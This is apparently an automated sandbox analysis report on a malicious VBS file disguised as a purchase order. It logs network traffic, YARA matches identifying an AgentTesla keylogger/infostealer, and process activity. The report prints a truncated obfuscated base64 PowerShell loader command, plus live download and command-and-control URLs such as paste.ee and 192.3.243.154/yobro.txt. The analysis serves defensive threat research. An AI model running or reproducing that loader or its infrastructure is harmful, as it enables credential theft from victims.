Windows Analysis Report
orden de compra.vbs

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Yara detected Generic Downloader

Source: Yara match

File source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /images/004/760/043/full/new_image.jpg?1711287887 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/760/044/original/new_image.jpg?1711287888 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /yobro.txt HTTP/1.1Host: 192.3.243.154Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 104.21.45.138 104.21.45.138
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /d/gK5wA HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.154

Source: global traffic	HTTP traffic detected: GET /d/gK5wA HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/760/043/full/new_image.jpg?1711287887 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/760/044/original/new_image.jpg?1711287888 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /yobro.txt HTTP/1.1Host: 192.3.243.154Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: powershell.exe, 00000003.00000002.1778680417.000001F40D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.154
Source: powershell.exe, 00000003.00000002.1778680417.000001F40D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.154/yobro.txt
Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2120789924.000001EC000A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1778680417.000001F406751000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000001.00000002.2120789924.000001EC00051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.2120789924.000001EC0006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1778680417.000001F406751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1687834660.000002262D153000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1689136984.000002262D068000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/gK5wA
Source: wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/gK5wA;
Source: wscript.exe, 00000000.00000002.1689631112.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688154539.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688844641.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688770085.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/gK5wAR
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000003.00000002.1777989868.000001F4047AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/
Source: powershell.exe, 00000003.00000002.1777989868.000001F4046C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887
Source: powershell.exe, 00000003.00000002.1777989868.000001F4046C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8818
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8818			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00E1A710	4_2_00E1A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00E14A80	4_2_00E14A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00E13E68	4_2_00E13E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00E141B0	4_2_00E141B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_00E1DAE0	4_2_00E1DAE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_062512D8	4_2_062512D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06253C30	4_2_06253C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 4_2_06253548	4_2_06253548

Source: orden de compra.vbs

Initial sample: Strings found which are bigger than 50

Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@8/6@3/4

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\gK5wA[1].txt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: NULL
